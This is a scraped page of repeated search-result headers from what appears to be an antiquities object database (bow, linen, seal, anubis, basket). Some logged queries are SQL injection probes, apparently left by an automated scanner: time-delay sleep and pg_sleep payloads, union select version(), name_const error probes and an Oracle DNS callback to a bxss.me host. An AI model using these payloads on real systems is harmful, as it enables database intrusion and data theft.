(hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for wreath - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for wreath - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for wreath - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for 1 - (hits/occ.: 145)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for wreath - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for wreath - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for gauntlet - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for fruit - (hits/occ.: 9)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for 0 - (hits/occ.: 32)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for 1 - (hits/occ.: 145)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for %5c - (hits/occ.: 0)Results List for %40%409yop6 - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for %bf'%bf - (hits/occ.: 0)Results List for %f0''%f0 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 0 - (hits/occ.: 32)Results List for 0 - (hits/occ.: 32)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for sysdate()%2csleep(3)%2c0)/*'xor(if(now()=sysdate()%2csleep(3)%2c0))or'xor(if(now()=sysdate()%2csleep(3)%2c0))or*/ - (hits/occ.: 0)Results List for (select(0)from(select(sleep(6)))v)/*'%2b(select(0)from(select(sleep(6)))v)%2b'%2b(select(0)from(select(sleep(6)))v)%2b*/ - (hits/occ.: 0)Results List for 2 - (hits/occ.: 150)Results List for lddogpqm';%20waitfor%20delay%20'0:0:3'%20--%20 - (hits/occ.: 0)Results List for i4k620au';select%20pg_sleep(6);%20--%20 - (hits/occ.: 0)Results List for iuewn13o');select%20pg_sleep(9);%20--%20 - (hits/occ.: 0)Results List for sbnj1ytb'));select%20pg_sleep(9);%20--%20 - (hits/occ.: 0)Results List for '%7c%7cutl_inaddr.get_host_address('dns.'%7c%7c'sqli.017595.70093-1143.70093.5d4c9.1.bxss'%7c%7c'.me')%7c%7c' - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for &sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for sysdate()%2csleep(9)%2c0)/*'xor(if(now()=sysdate()%2csleep(9)%2c0))or'xor(if(now()=sysdate()%2csleep(9)%2c0))or*/&sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 2&sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for %5c - (hits/occ.: 0)Results List for %40%40q4iri - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for %bf'%bf - (hits/occ.: 0)Results List for %f0''%f0 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 0 - (hits/occ.: 32)Results List for 0 - (hits/occ.: 32)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for sysdate()%2csleep(22.875)%2c0)/*'xor(if(now()=sysdate()%2csleep(22.875)%2c0))or'xor(if(now()=sysdate()%2csleep(22.875)%2c0))or*/ - (hits/occ.: 0)Results List for (select(0)from(select(sleep(7.625)))v)/*'%2b(select(0)from(select(sleep(7.625)))v)%2b'%2b(select(0)from(select(sleep(7.625)))v)%2b*/ - (hits/occ.: 0)Results List for 2 - (hits/occ.: 150)Results List for qvh53v78';%20waitfor%20delay%20'0:0:22.875'%20--%20 - (hits/occ.: 0)Results List for nagvfhyq';select%20pg_sleep(7.625);%20--%20 - (hits/occ.: 0)Results List for dupryxfo');select%20pg_sleep(15.25);%20--%20 - (hits/occ.: 0)Results List for '%7c%7cutl_inaddr.get_host_address('dns.'%7c%7c'sqli.017595.70372-1140.70372.a6819.1.bxss'%7c%7c'.me')%7c%7c' - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for &sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for sysdate()%2csleep(9)%2c0)/*'xor(if(now()=sysdate()%2csleep(9)%2c0))or'xor(if(now()=sysdate()%2csleep(9)%2c0))or*/&sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 2&sta=1 - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for loin2121121121212.1 - (hits/occ.: 0)Results List for loin%20and%201%3d1 - (hits/occ.: 0)Results List for loin%20and%201%3e1 - (hits/occ.: 0)Results List for loin%27%20and%20%27x%27%3d%27x - (hits/occ.: 0)Results List for loin%27%20and%20%27x%27%3d%27y - (hits/occ.: 0)Results List for loin%20and%20x%3dx - (hits/occ.: 0)Results List for loin%22%20and%20%22x%22%3d%22y - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for loin999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3d1 - (hits/occ.: 0)Results List for %27x - (hits/occ.: 0)Results List for %22x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3d1 - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for loin2121121121212.1 - (hits/occ.: 0)Results List for loin%20and%201%3d1 - (hits/occ.: 0)Results List for loin%20and%201%3e1 - (hits/occ.: 0)Results List for loin%27%20and%20%27x%27%3d%27x - (hits/occ.: 0)Results List for loin%27%20and%20%27x%27%3d%27y - (hits/occ.: 0)Results List for loin%20and%20x%3dx - (hits/occ.: 0)Results List for loin%22%20and%20%22x%22%3d%22y - (hits/occ.: 0)Results List for 1 - (hits/occ.: 145)Results List for loin999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3d1 - (hits/occ.: 0)Results List for %27x - (hits/occ.: 0)Results List for %22x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3d1 - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x - (hits/occ.: 0)Results List for (select*from(select%20name_const(char(111,108,111,108,111,115,104,101,114),1),name_const(char(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for 1 - (hits/occ.: 145)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - 